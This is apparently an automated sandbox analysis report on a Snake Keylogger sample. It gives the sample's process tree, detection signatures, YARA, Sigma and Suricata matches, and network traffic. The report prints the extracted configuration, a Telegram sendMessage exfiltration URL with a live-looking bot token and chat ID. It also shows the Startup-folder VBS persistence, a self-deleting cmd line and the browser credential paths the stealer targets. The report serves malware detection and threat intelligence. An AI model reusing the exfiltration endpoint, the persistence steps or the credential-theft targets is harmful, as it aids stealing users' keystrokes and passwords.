Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8kDIr4ZdNj.exe

Overview

General Information

Sample name:8kDIr4ZdNj.exe
renamed because original name is a hash value
Original sample name:d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f.exe
Analysis ID:1587675
MD5:a031da4bae8bd9cf87c071c94f67d21b
SHA1:29146f6e8d3107eb8cc5b362b15d8e57c3f815fb
SHA256:d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8kDIr4ZdNj.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
    • lecheries.exe (PID: 4596 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
      • RegSvcs.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • EmbeddedExe1.exe (PID: 3792 cmdline: "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe" MD5: 5EFEF6CC9CD24BAEEED71C1107FC32DF)
        • EmbeddedExe2.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" MD5: 099EB488DBC2288AB41C4EF64EA7DBA4)
          • cmd.exe (PID: 4544 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • choice.exe (PID: 3172 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 4368 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • lecheries.exe (PID: 2276 cmdline: "C:\Users\user\AppData\Local\konked\lecheries.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
      • RegSvcs.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\konked\lecheries.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 6272 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14c35:$a1: get_encryptedPassword
        • 0x14f21:$a2: get_encryptedUsername
        • 0x14a41:$a3: get_timePasswordChanged
        • 0x14b3c:$a4: get_passwordField
        • 0x14c4b:$a5: set_encryptedPassword
        • 0x162f7:$a7: get_logins
        • 0x1625a:$a10: KeyLoggerEventArgs
        • 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data
        • 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 2 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0xc49:$a1: get_encryptedPassword
            • 0xf35:$a2: get_encryptedUsername
            • 0xa55:$a3: get_timePasswordChanged
            • 0xb50:$a4: get_passwordField
            • 0xc5f:$a5: set_encryptedPassword
            • 0x230b:$a7: get_logins
            • 0x226e:$a10: KeyLoggerEventArgs
            • 0x1ed9:$a11: KeyLoggerEventArgsEventHandler
            00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
            • 0x5bf4:$x1: $%SMTPDV$
            • 0x45d8:$x2: $#TheHashHere%&
            • 0x5b9c:$x3: %FTPDV$
            • 0x4578:$x4: $%TelegramDv$
            • 0x1ed9:$x5: KeyLoggerEventArgs
            • 0x226e:$x5: KeyLoggerEventArgs
            • 0x5bc0:$m2: Clipboard Logs ID
            • 0x5dfe:$m2: Screenshot Logs ID
            • 0x5f0e:$m2: keystroke Logs ID
            • 0x61e8:$m3: SnakePW
            • 0x5dd6:$m4: \SnakeKeylogger\
            00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 36 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.RegSvcs.exe.8982ac.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                3.2.RegSvcs.exe.8982ac.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  3.2.RegSvcs.exe.8982ac.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x12e35:$a1: get_encryptedPassword
                  • 0x13121:$a2: get_encryptedUsername
                  • 0x12c41:$a3: get_timePasswordChanged
                  • 0x12d3c:$a4: get_passwordField
                  • 0x12e4b:$a5: set_encryptedPassword
                  • 0x144f7:$a7: get_logins
                  • 0x1445a:$a10: KeyLoggerEventArgs
                  • 0x140c5:$a11: KeyLoggerEventArgsEventHandler
                  3.2.RegSvcs.exe.8982ac.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x1a7b2:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x199e4:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x19e17:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x1ae56:$a5: \Kometa\User Data\Default\Login Data
                  3.2.RegSvcs.exe.8982ac.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                  • 0x13a32:$s1: UnHook
                  • 0x13a39:$s2: SetHook
                  • 0x13a41:$s3: CallNextHook
                  • 0x13a4e:$s4: _hook
                  Click to see the 69 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , ProcessId: 4368, ProcessName: wscript.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" , ProcessId: 4368, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\konked\lecheries.exe, ProcessId: 4596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T16:46:56.002743+010028033053Unknown Traffic192.168.2.649713104.21.16.1443TCP
                  2025-01-10T16:46:58.651903+010028033053Unknown Traffic192.168.2.649729104.21.16.1443TCP
                  2025-01-10T16:46:59.948839+010028033053Unknown Traffic192.168.2.649740104.21.16.1443TCP
                  2025-01-10T16:47:02.697410+010028033053Unknown Traffic192.168.2.649759104.21.16.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T16:46:54.328980+010028032742Potentially Bad Traffic192.168.2.649710193.122.6.16880TCP
                  2025-01-10T16:46:55.436814+010028032742Potentially Bad Traffic192.168.2.649710193.122.6.16880TCP
                  2025-01-10T16:46:56.780575+010028032742Potentially Bad Traffic192.168.2.649714193.122.6.16880TCP
                  2025-01-10T16:46:58.077474+010028032742Potentially Bad Traffic192.168.2.649726193.122.6.16880TCP
                  2025-01-10T16:46:59.385176+010028032742Potentially Bad Traffic192.168.2.649734193.122.6.16880TCP
                  2025-01-10T16:47:00.702469+010028032742Potentially Bad Traffic192.168.2.649746193.122.6.16880TCP
                  2025-01-10T16:47:01.999344+010028032742Potentially Bad Traffic192.168.2.649754193.122.6.16880TCP
                  2025-01-10T16:47:03.405608+010028032742Potentially Bad Traffic192.168.2.649765193.122.6.16880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Found malware configuration
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeReversingLabs: Detection: 65%
                  Multi AV Scanner detection for submitted file
                  Source: 8kDIr4ZdNj.exeVirustotal: Detection: 70%Perma Link
                  Source: 8kDIr4ZdNj.exeReversingLabs: Detection: 65%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 8kDIr4ZdNj.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: 8kDIr4ZdNj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49711 version: TLS 1.0
                  Source: Binary string: wntdll.pdbUGP source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008F445A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FC6D1 FindFirstFileW,FindClose,0_2_008FC6D1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_008FC75C
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008FEF95
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008FF0F2
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008FF3F3
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008F37EF
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008F3B12
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008FBCBC
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00BC445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00BC445A
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED13F40 FindFirstFileA,FindClose,5_2_00007FF75ED13F40
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED06B00 GetProcAddress,FindFirstFileA,CloseHandle,5_2_00007FF75ED06B00
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ECE0520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,5_2_00007FF75ECE0520
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED12190 FindFirstFileA,FindClose,FindWindowA,5_2_00007FF75ED12190

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49765 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49746 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49754 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49713 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49759 -> 104.21.16.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49711 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_009022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009022EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
